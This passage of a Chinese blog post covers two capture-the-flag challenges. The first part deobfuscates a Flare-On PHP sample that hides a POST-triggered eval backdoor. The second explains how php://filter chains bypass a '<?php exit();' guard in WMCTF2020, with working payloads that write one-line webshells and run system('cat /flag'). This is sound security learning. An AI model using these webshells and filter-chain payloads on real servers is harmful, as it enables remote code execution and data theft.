class="hljs-number">28</span>, <span class="hljs-number">48</span>, <span class="hljs-number">19</span>, <span class="hljs-number">40</span>, <span class="hljs-number">0</span>, <span class="hljs-number">25</span>, <span class="hljs-number">5</span>, <span class="hljs-number">37</span>, <span class="hljs-number">0</span>, <span class="hljs-number">24</span>, <span class="hljs-number">1</span>, <span class="hljs-number">87</span>, <span class="hljs-number">93</span>, <span class="hljs-number">18</span>, <span class="hljs-number">11</span>, <span class="hljs-number">66</span>, <span class="hljs-number">28</span>, <span class="hljs-number">18</span>, <span class="hljs-number">87</span>, <span class="hljs-number">70</span>, <span class="hljs-number">28</span>, <span class="hljs-number">48</span>, <span class="hljs-number">19</span>, <span class="hljs-number">7</span>, <span class="hljs-number">63</span>, <span class="hljs-number">50</span>, <span class="hljs-number">5</span>, <span class="hljs-number">37</span>, <span class="hljs-number">0</span>, <span class="hljs-number">18</span>, <span class="hljs-number">1</span>, <span class="hljs-number">87</span>, <span class="hljs-number">42</span>, <span class="hljs-number">24</span>, <span class="hljs-number">60</span>, <span class="hljs-number">87</span>, <span class="hljs-number">0</span>, <span class="hljs-number">24</span>, <span class="hljs-number">17</span>, <span class="hljs-number">91</span>, <span class="hljs-number">28</span>, <span class="hljs-number">18</span>, <span class="hljs-number">75</span>, <span class="hljs-number">49</span>, <span class="hljs-number">28</span>, <span class="hljs-number">18</span>, <span class="hljs-number">45</span>, <span class="hljs-number">12</span>, <span class="hljs-number">28</span>, <span class="hljs-number">48</span>, <span class="hljs-number">19</span>, <span class="hljs-number">40</span>, <span class="hljs-number">0</span>, <span class="hljs-number">7</span>, <span class="hljs-number">5</span>, <span class="hljs-number">37</span>, <span class="hljs-number">0</span>, <span class="hljs-number">24</span>, <span class="hljs-number">90</span>, <span class="hljs-number">87</span>, <span class="hljs-number">93</span>, <span class="hljs-number">18</span>, <span class="hljs-number">81</span>, <span class="hljs-number">37</span>, <span class="hljs-number">28</span>, <span class="hljs-number">48</span>, <span class="hljs-number">19</span>, <span class="hljs-number">49</span>, <span class="hljs-number">0</span>, <span class="hljs-number">50</span>, <span class="hljs-number">5</span>, <span class="hljs-number">40</span>, <span class="hljs-number">63</span>, <span class="hljs-number">25</span>, <span class="hljs-number">5</span>, <span class="hljs-number">91</span>, <span class="hljs-number">63</span>, <span class="hljs-number">50</span>, <span class="hljs-number">5</span>, <span class="hljs-number">37</span>, <span class="hljs-number">0</span>, <span class="hljs-number">18</span>, <span class="hljs-number">68</span>, <span class="hljs-number">87</span>, <span class="hljs-number">93</span>, <span class="hljs-number">18</span>, <span class="hljs-number">1</span>, <span class="hljs-number">18</span>, <span class="hljs-number">28</span>, <span class="hljs-number">48</span>, <span class="hljs-number">19</span>, <span class="hljs-number">40</span>, <span class="hljs-number">0</span>, <span class="hljs-number">25</span>, <span class="hljs-number">5</span>, <span class="hljs-number">37</span>, <span class="hljs-number">0</span>, <span class="hljs-number">24</span>, <span class="hljs-number">90</span>, <span class="hljs-number">87</span>, <span class="hljs-number">0</span>, <span class="hljs-number">24</span>, <span class="hljs-number">72</span>, <span class="hljs-number">37</span>, <span class="hljs-number">28</span>, <span class="hljs-number">48</span>, <span class="hljs-number">19</span>, <span class="hljs-number">66</span>, <span class="hljs-number">63</span>, <span class="hljs-number">50</span>, <span class="hljs-number">5</span>, <span class="hljs-number">40</span>, <span class="hljs-number">63</span>, <span class="hljs-number">25</span>, <span class="hljs-number">37</span>, <span class="hljs-number">91</span>, <span class="hljs-number">63</span>, <span class="hljs-number">24</span>, <span class="hljs-number">63</span>, <span class="hljs-number">87</span>, <span class="hljs-number">63</span>, <span class="hljs-number">12</span>, <span class="hljs-number">68</span>, <span class="hljs-number">87</span>, <span class="hljs-number">0</span>, <span class="hljs-number">24</span>, <span class="hljs-number">17</span>, <span class="hljs-number">37</span>, <span class="hljs-number">28</span>, <span class="hljs-number">48</span>, <span class="hljs-number">19</span>, <span class="hljs-number">40</span>, <span class="hljs-number">90</span>, <span class="hljs-number">25</span>, <span class="hljs-number">37</span>, <span class="hljs-number">91</span>, <span class="hljs-number">63</span>, <span class="hljs-number">18</span>, <span class="hljs-number">90</span>, <span class="hljs-number">87</span>, <span class="hljs-number">93</span>, <span class="hljs-number">18</span>, <span class="hljs-number">90</span>, <span class="hljs-number">38</span>, <span class="hljs-number">28</span>, <span class="hljs-number">18</span>, <span class="hljs-number">19</span>, <span class="hljs-number">66</span>, <span class="hljs-number">28</span>, <span class="hljs-number">18</span>, <span class="hljs-number">75</span>, <span class="hljs-number">70</span>, <span class="hljs-number">28</span>, <span class="hljs-number">48</span>, <span class="hljs-number">19</span>, <span class="hljs-number">40</span>, <span class="hljs-number">90</span>, <span class="hljs-number">58</span>, <span class="hljs-number">37</span>, <span class="hljs-number">91</span>, <span class="hljs-number">63</span>, <span class="hljs-number">75</span>, <span class="hljs-number">11</span>, <span class="hljs-number">79</span>, <span class="hljs-number">28</span>, <span class="hljs-number">27</span>, <span class="hljs-number">75</span>, <span class="hljs-number">3</span>, <span class="hljs-number">42</span>, <span class="hljs-number">23</span>, <span class="hljs-number">88</span>, <span class="hljs-number">30</span>, <span class="hljs-number">35</span>, <span class="hljs-number">47</span>, <span class="hljs-number">59</span>, <span class="hljs-number">71</span>, <span class="hljs-number">71</span>, <span class="hljs-number">73</span>, <span class="hljs-number">35</span>, <span class="hljs-number">68</span>, <span class="hljs-number">38</span>, <span class="hljs-number">63</span>, <span class="hljs-number">8</span>, <span class="hljs-number">1</span>, <span class="hljs-number">38</span>, <span class="hljs-number">45</span>, <span class="hljs-number">30</span>, <span class="hljs-number">81</span>, <span class="hljs-number">15</span>, <span class="hljs-number">50</span>, <span class="hljs-number">12</span>, <span class="hljs-number">1</span>, <span class="hljs-number">24</span>, <span class="hljs-number">81</span>, <span class="hljs-number">66</span>, <span class="hljs-number">28</span>, <span class="hljs-number">40</span>, <span class="hljs-number">90</span>, <span class="hljs-number">58</span>, <span class="hljs-number">81</span>, <span class="hljs-number">40</span>, <span class="hljs-number">30</span>, <span class="hljs-number">75</span>, <span class="hljs-number">1</span>, <span class="hljs-number">27</span>, <span class="hljs-number">19</span>, <span class="hljs-number">75</span>, <span class="hljs-number">28</span>, <span class="hljs-number">23</span>, <span class="hljs-number">75</span>, <span class="hljs-number">77</span>, <span class="hljs-number">1</span>, <span class="hljs-number">28</span>, <span class="hljs-number">1</span>, <span class="hljs-number">43</span>, <span class="hljs-number">52</span>, <span class="hljs-number">31</span>, <span class="hljs-number">19</span>, <span class="hljs-number">75</span>, <span class="hljs-number">81</span>, <span class="hljs-number">40</span>, <span class="hljs-number">30</span>, <span class="hljs-number">75</span>, <span class="hljs-number">1</span>, <span class="hljs-number">27</span>, <span class="hljs-number">75</span>, <span class="hljs-number">77</span>, <span class="hljs-number">35</span>, <span class="hljs-number">47</span>, <span class="hljs-number">59</span>, <span class="hljs-number">71</span>, <span class="hljs-number">71</span>, <span class="hljs-number">71</span>, <span class="hljs-number">73</span>, <span class="hljs-number">21</span>, <span class="hljs-number">4</span>, <span class="hljs-number">37</span>, <span class="hljs-number">51</span>, <span class="hljs-number">40</span>, <span class="hljs-number">4</span>, <span class="hljs-number">7</span>, <span class="hljs-number">91</span>, <span class="hljs-number">7</span>, <span class="hljs-number">4</span>, <span class="hljs-number">37</span>, <span class="hljs-number">77</span>, <span class="hljs-number">49</span>, <span class="hljs-number">4</span>, <span class="hljs-number">7</span>, <span class="hljs-number">91</span>, <span class="hljs-number">70</span>, <span class="hljs-number">4</span>, <span class="hljs-number">37</span>, <span class="hljs-number">49</span>, <span class="hljs-number">51</span>, <span class="hljs-number">4</span>, <span class="hljs-number">51</span>, <span class="hljs-number">91</span>, <span class="hljs-number">4</span>, <span class="hljs-number">37</span>, <span class="hljs-number">70</span>, <span class="hljs-number">6</span>, <span class="hljs-number">4</span>, <span class="hljs-number">7</span>, <span class="hljs-number">91</span>, <span class="hljs-number">91</span>, <span class="hljs-number">4</span>, <span class="hljs-number">37</span>, <span class="hljs-number">51</span>, <span class="hljs-number">70</span>, <span class="hljs-number">4</span>, <span class="hljs-number">7</span>, <span class="hljs-number">91</span>, <span class="hljs-number">49</span>, <span class="hljs-number">4</span>, <span class="hljs-number">37</span>, <span class="hljs-number">51</span>, <span class="hljs-number">6</span>, <span class="hljs-number">4</span>, <span class="hljs-number">7</span>, <span class="hljs-number">91</span>, <span class="hljs-number">91</span>, <span class="hljs-number">4</span>, <span class="hljs-number">37</span>, <span class="hljs-number">51</span>, <span class="hljs-number">70</span>, <span class="hljs-number">21</span>, <span class="hljs-number">47</span>, <span class="hljs-number">93</span>, <span class="hljs-number">8</span>, <span class="hljs-number">10</span>, <span class="hljs-number">58</span>, <span class="hljs-number">82</span>, <span class="hljs-number">59</span>, <span class="hljs-number">71</span>, <span class="hljs-number">71</span>, <span class="hljs-number">71</span>, <span class="hljs-number">82</span>, <span class="hljs-number">59</span>, <span class="hljs-number">71</span>, <span class="hljs-number">71</span>, <span class="hljs-number">29</span>, <span class="hljs-number">29</span>, <span class="hljs-number">47</span>);<br><span class="hljs-variable">$do_me</span>=<span class="hljs-string">&quot;&quot;</span>;<br><span class="hljs-keyword">for</span>(<span class="hljs-variable">$i</span>=<span class="hljs-number">0</span>;<span class="hljs-variable">$i</span>&lt;<span class="hljs-title function_ invoke__">count</span>(<span class="hljs-variable">$order</span>);<span class="hljs-variable">$i</span>++)<br>&#123;<br>    <span class="hljs-variable">$do_me</span>=<span class="hljs-variable">$do_me</span>.<span class="hljs-variable">$terms</span>[<span class="hljs-variable">$order</span>[<span class="hljs-variable">$i</span>]];<br>&#125;<br><span class="hljs-comment">#   echo($do_me);</span><br><span class="hljs-keyword">eval</span>(<span class="hljs-variable">$do_me</span>); <span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>回显一下do_me。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$_</span>= \<span class="hljs-string">&#x27;aWYoaXNzZXQoJF9QT1NUWyJcOTdcNDlcNDlcNjhceDRGXDg0XDExNlx4NjhcOTdceDc0XHg0NFx4NEZceDU0XHg2QVw5N1x4NzZceDYxXHgzNVx4NjNceDcyXDk3XHg3MFx4NDFcODRceDY2XHg2Q1w5N1x4NzJceDY1XHg0NFw2NVx4NTNcNzJcMTExXDExMFw2OFw3OVw4NFw5OVx4NkZceDZEIl0pKSB7IGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbIlw5N1w0OVx4MzFcNjhceDRGXHg1NFwxMTZcMTA0XHg2MVwxMTZceDQ0XDc5XHg1NFwxMDZcOTdcMTE4XDk3XDUzXHg2M1wxMTRceDYxXHg3MFw2NVw4NFwxMDJceDZDXHg2MVwxMTRcMTAxXHg0NFw2NVx4NTNcNzJcMTExXHg2RVx4NDRceDRGXDg0XDk5XHg2Rlx4NkQiXSkpOyB9\&#x27;;</span><br><span class="hljs-string">$__=\&#x27;JGNvZGU9YmFzZTY0X2RlY29kZSgkXyk7ZXZhbCgkY29kZSk7\&#x27;;</span><br><span class="hljs-string">$___=&quot;\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65&quot;;</span><br><span class="hljs-string">eval($___($__));</span><br><span class="hljs-string"></span><br></code></pre></td></tr></table></figure>

<p>base64解码一下。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">if</span>(<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&quot;\x61\x31\x31\x44\x4F\x54\x74\x68\x61\x74\x44\x4F\x54\x6A\x61\x76\x61\x35\x63\x72\x61\x70\x41\84\x66\x6C\x61\x72\x65\x44\65\x53\72\111\110\x44\79\84\99\x6F\x6D&quot;</span>]))<br>&#123;<br><span class="hljs-keyword">eval</span>(<span class="hljs-title function_ invoke__">base64_decode</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&quot;\97\49\x31\68\x4F\x54\116\104\x61\116\x44\79\x54\106\97\118\97\53\x63\114\x61\x70\65\84\102\x6C\x61\114\101\x44\65\x53\72\111\x6E\x44\x4F\84\99\x6F\x6D&quot;</span>]));<br>&#125;<br><span class="hljs-variable">$code</span>=<span class="hljs-title function_ invoke__">base64_decode</span>(<span class="hljs-variable">$_</span>);<br><span class="hljs-keyword">eval</span>(<span class="hljs-variable">$code</span>);<br></code></pre></td></tr></table></figure>

<p>这里就没有去写脚本了。\ 后面跟十进制数，\x 后面跟十六进制数。网站直接16进制转字符串。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs 16进制">\x61\x31\x31\x44\x4F\x54\x74\x68\x61\x74\x44\x4F\x54\x6A\x61\x76\x61\x35\x63\x72\x61\x70\x41\x54\x66\x6C\x61\x72\x65\x44\x41\x53\x48\x6f\x6e\x44\x4f\x54\x63\x6F\x6D<br><br>a11DOTthatDOTjava5crapATflareDASHonDOTcom<br></code></pre></td></tr></table></figure>

<p>后续是看了wp的。</p>
<p><strong>按照 flareon 比赛 flag 的尿性，DOT 要换成 .，AT 换成 @，DASH 换成 -，得到最终的 flag</strong><br>最终<a href="mailto:&#97;&#49;&#49;&#x2e;&#116;&#104;&#x61;&#116;&#x2e;&#x6a;&#x61;&#118;&#x61;&#x35;&#x63;&#x72;&#x61;&#112;&#64;&#x66;&#x6c;&#97;&#x72;&#101;&#45;&#111;&#x6e;&#x2e;&#x63;&#x6f;&#x6d;">&#97;&#49;&#49;&#x2e;&#116;&#104;&#x61;&#116;&#x2e;&#x6a;&#x61;&#118;&#x61;&#x35;&#x63;&#x72;&#x61;&#112;&#64;&#x66;&#x6c;&#97;&#x72;&#101;&#45;&#111;&#x6e;&#x2e;&#x63;&#x6f;&#x6d;</a>。</p>
<p><img src="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203261210449.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="WMCTF2020-Web-Check-in-2-0"><a href="#WMCTF2020-Web-Check-in-2-0" class="headerlink" title="[WMCTF2020]Web Check in 2.0"></a>[WMCTF2020]Web Check in 2.0</h2><p>进去一看代码 感觉读懂了。<br><img src="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203261210648.png" srcset="/img/loading.gif" lazyload alt="QQ截图20220215113647"></p>
<p>洋洋得意直接构造链接—&gt;<a target="_blank" rel="noopener" href="http://48571e46-9b1c-4cf3-9889-cfbef23ea393.node4.buuoj.cn:81/?content=flag.php">http://48571e46-9b1c-4cf3-9889-cfbef23ea393.node4.buuoj.cn:81/?content=flag.php</a><br>很打脸。<br>然后再仔细读了读。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span> <span class="hljs-keyword">exit</span>();&gt;<br></code></pre></td></tr></table></figure>

<p>这不是直接就退出了嘛。网上翻阅很久资料后续看到p神的文章。<br><a target="_blank" rel="noopener" href="https://www.leavesongs.com/PENETRATION/php-filter-magic.html">https://www.leavesongs.com/PENETRATION/php-filter-magic.html</a></p>
<h3 id="绕过-lt-php-exit-gt"><a href="#绕过-lt-php-exit-gt" class="headerlink" title="绕过&lt;?php exit();&gt;"></a>绕过&lt;?php exit();&gt;</h3><p><a target="_blank" rel="noopener" href="https://bbs.pediy.com/thread-271283.htm%E8%BF%99%E6%98%AFh3%E5%B8%88%E5%82%85%E7%9A%84%E6%96%87%E7%AB%A0%EF%BC%8C%E5%BB%BA%E8%AE%AE%E8%AF%A6%E8%AF%BB%E3%80%82">https://bbs.pediy.com/thread-271283.htm这是h3师傅的文章，建议详读。</a></p>
<h3 id="巧用base64编码"><a href="#巧用base64编码" class="headerlink" title="巧用base64编码"></a>巧用base64编码</h3><p>p神文章讲的很清楚。<br>自己不很清楚点的。</p>
<ul>
<li>&#96;&#96;&#96;php<br>$content .&#x3D; $_POST[‘txt’];  #这里的点是连接的意思，哈哈哈小白非常菜 仔细读p神的文章及他的图片+半猜半蒙<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs php"><br>- base64解码方式：“phpexit”一共<span class="hljs-number">7</span>个字符，因为base64算法解码时是<span class="hljs-number">4</span>个byte一组，所以给他增加<span class="hljs-number">1</span>个“a”一共<span class="hljs-number">8</span>个字符。这样，<span class="hljs-string">&quot;phpexita&quot;</span>被正常解码，而后面我们传入的webshell的base64内容也被正常解码。结果就是`<span class="hljs-meta">&lt;?php</span> <span class="hljs-keyword">exit</span>; <span class="hljs-meta">?&gt;</span>`没有了。<br><br>- ```php<br>  <span class="hljs-title function_ invoke__">preg_replace</span>(<span class="hljs-string">&#x27;|[^a-z0-9A-Z+/]|s&#x27;</span>, <span class="hljs-string">&#x27;&#x27;</span>, <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;txt&#x27;</span>])<br>  <span class="hljs-comment">#匹配字符 替换成的字符 替换目标</span><br></code></pre></td></tr></table></figure></li>
</ul>
<h3 id="巧用字符串操作"><a href="#巧用字符串操作" class="headerlink" title="巧用字符串操作"></a>巧用字符串操作</h3><ul>
<li><pre><code class="php">&lt;?php exit; ?&gt; # 实际上是一个XML标签
<figure class="highlight autohotkey"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs autohotkey"><br>- ```php<br>  strip_tags() # — 从字符串中去除 HTML 和 PHP 标记<br></code></pre></td></tr></table></figure>
</code></pre>
</li>
<li><p>php:&#x2F;&#x2F;filter允许使用多个过滤器，我们可以先将webshell用base64编码。在调用完成strip_tags后再进行base64-decode。“死亡exit”在第一步被去除，而webshell在第二步被还原。</p>
</li>
<li><p>除此之外，我们还可以利用rot13编码独立完成任务。原理和上面类似，核心是将“死亡exit”去除。<code>&lt;?php exit; ?&gt;</code>在经过rot13编码后会变成<code>&lt;?cuc rkvg; ?&gt;</code>，在PHP不开启short_open_tag时，php不认识这个字符串，当然也就不会执行了。</p>
</li>
</ul>
<h3 id="解题"><a href="#解题" class="headerlink" title="解题"></a>解题</h3><h3 id="require-once"><a href="#require-once" class="headerlink" title="require_once"></a>require_once</h3><p>rot3加密：<a target="_blank" rel="noopener" href="http://www.hiencode.com/rot13.html">http://www.hiencode.com/rot13.html</a><br>require_once:<a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/function.require-once.php">https://www.php.net/manual/zh/function.require-once.php</a></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span> @<span class="hljs-keyword">eval</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;cmd&#x27;</span>]);<span class="hljs-meta">?&gt;</span>   <span class="hljs-comment">#rot3编码</span><br>cuc @<span class="hljs-title function_ invoke__">riny</span>(<span class="hljs-variable">$_cbfg</span>[<span class="hljs-string">&#x27;pzq&#x27;</span>]);<br><br>php:<span class="hljs-comment">//filter/write=string.%7%32ot13|cuc @riny($_cbfg[&#x27;pzq&#x27;]);|/resource=shell.php </span><br><br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/QQ%E6%88%AA%E5%9B%BE20220215144143.png" srcset="/img/loading.gif" lazyload alt="QQ截图20220215144143"></p>
<p>这里就导致不能直接写入一句话木马，导致每次都要重写文件。(来自<strong>H3h3QAQ</strong>)师傅的解答。</p>
<h3 id="过滤器绕过"><a href="#过滤器绕过" class="headerlink" title="过滤器绕过"></a>过滤器绕过</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs php">?<br>content=php:<span class="hljs-comment">//filter/zlib.deflate|string.tolower|zlib.inflate|?&gt;&lt;?php%0deval($_GET[1]);?&gt;/resource=h3.php</span><br><br>?content=h3.php&amp;<span class="hljs-number">1</span>=<span class="hljs-title function_ invoke__">system</span>(<span class="hljs-string">&#x27;ls /&#x27;</span>);  <br><br>?content=php:<span class="hljs-comment">//filter/zlib.deflate|string.tolower|zlib.inflate|?&gt;&lt;?php%0deval($_GET[1]);?&gt;/resource=h3.php</span><br><br>?content=h3.php&amp;<span class="hljs-number">1</span>=<span class="hljs-title function_ invoke__">system</span>(<span class="hljs-string">&#x27;cat /flag&#x27;</span>); <br><br></code></pre></td></tr></table></figure>

<p>这里直接采用h3师傅的绕过。哈哈哈。</p>
<p><img src="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203261210486.png" srcset="/img/loading.gif" lazyload alt="QQ截图20220215145358"></p>
<p><img src="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203261210881.png" srcset="/img/loading.gif" lazyload alt="QQ截图20220215144737"></p>
<p>帮婆婆拖地去了，明天就要走了。</p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/Web/">Web</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/ctf/">ctf</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2022/02/27/PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B9%8B%E5%AD%97%E7%AC%A6%E4%B8%B2%E9%80%83%E9%80%B8%EF%BC%88%E5%8F%98%E7%9F%AD%EF%BC%89/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">PHP反序列化之字符串逃逸（变短）</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/02/25/%E5%88%9D%E7%90%86%E8%A7%A3%E5%8F%8D%E5%B0%84/">
                        <span class="hidden-mobile">初理解反射</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
    <!--《添加网站运行时间 -->
<br/>

<span id="timeDate">载入天数...</span><span id="times">载入时分秒...</span>
<script>
var now = new Date(); 

function createtime() {
    //此处修改你的建站时间或者网站上线时间
    var grt = new Date('02/23/2022 00:00:00');
    now.setTime(now.getTime() + 250);
    days = (now - grt) / 1000 / 60 / 60 / 24;

    dnum = Math.floor(days);
    hours = (now - grt) / 1000 / 60 / 60 - (24 * dnum);
    hnum = Math.floor(hours);
    if (String(hnum).length == 1) {
        hnum = "0" + hnum;
    }
    minutes = (now - grt) / 1000 / 60 - (24 * 60 * dnum) - (60 * hnum);
    mnum = Math.floor(minutes);
    if (String(mnum).length == 1) {
        mnum = "0" + mnum;
    }
    seconds = (now - grt) / 1000 - (24 * 60 * 60 * dnum) - (60 * 60 * hnum) - (60 * mnum);
    snum = Math.round(seconds);
    if (String(snum).length == 1) {
        snum = "0" + snum;
    }
    document.getElementById("timeDate").innerHTML = "" + dnum + " 天 ";
    document.getElementById("times").innerHTML = hnum + " 小时 " + mnum + " 分 " + snum + " 秒";
}
setInterval("createtime()", 250);
</script>

<!-- 添加网站运行时间》-->

  </div>
  

  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  <script  src="/js/local-search.js" ></script>



  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  
    <script  src="https://cdn.jsdelivr.net/npm/tocbot@4/dist/tocbot.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4/anchor.min.js" ></script>
  
  
    <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js" ></script>
  






  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
